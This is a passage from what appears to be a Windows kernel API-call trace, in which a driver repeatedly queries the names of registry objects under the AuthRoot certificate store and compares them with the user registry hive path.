| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\30D4246F07FFDB91898A0BE9496611EB8C5E46E5, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\30D4246F07FFDB91898A0BE9496611EB8C5E46E5 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\30D4246F07FFDB91898A0BE9496611EB8C5E46E5, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\30D4246F07FFDB91898A0BE9496611EB8C5E46E5 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\313B8D0E7E2E4D20AE8668FFE59DB5193CBF7A32, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\313B8D0E7E2E4D20AE8668FFE59DB5193CBF7A32 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\313B8D0E7E2E4D20AE8668FFE59DB5193CBF7A32, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\313B8D0E7E2E4D20AE8668FFE59DB5193CBF7A32 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\313B8D0E7E2E4D20AE8668FFE59DB5193CBF7A32, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\313B8D0E7E2E4D20AE8668FFE59DB5193CBF7A32 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3143649BECCE27ECED3A3F0B8F0DE4E891DDEECA, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3143649BECCE27ECED3A3F0B8F0DE4E891DDEECA | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3143649BECCE27ECED3A3F0B8F0DE4E891DDEECA, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3143649BECCE27ECED3A3F0B8F0DE4E891DDEECA | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3143649BECCE27ECED3A3F0B8F0DE4E891DDEECA, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3143649BECCE27ECED3A3F0B8F0DE4E891DDEECA | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\31F1FD68226320EEC63B3F9DEA4A3E537C7C3917, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\31F1FD68226320EEC63B3F9DEA4A3E537C7C3917 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\31F1FD68226320EEC63B3F9DEA4A3E537C7C3917, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\31F1FD68226320EEC63B3F9DEA4A3E537C7C3917 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\31F1FD68226320EEC63B3F9DEA4A3E537C7C3917, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\31F1FD68226320EEC63B3F9DEA4A3E537C7C3917 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\31F9FC8BA3805986B721EA7295C65B3A44534274, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\31F9FC8BA3805986B721EA7295C65B3A44534274 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\31F9FC8BA3805986B721EA7295C65B3A44534274, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\31F9FC8BA3805986B721EA7295C65B3A44534274 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\31F9FC8BA3805986B721EA7295C65B3A44534274, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\31F9FC8BA3805986B721EA7295C65B3A44534274 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\323C118E1BF7B8B65254E2E2100DD6029037F096, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\323C118E1BF7B8B65254E2E2100DD6029037F096 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\323C118E1BF7B8B65254E2E2100DD6029037F096, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\323C118E1BF7B8B65254E2E2100DD6029037F096 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
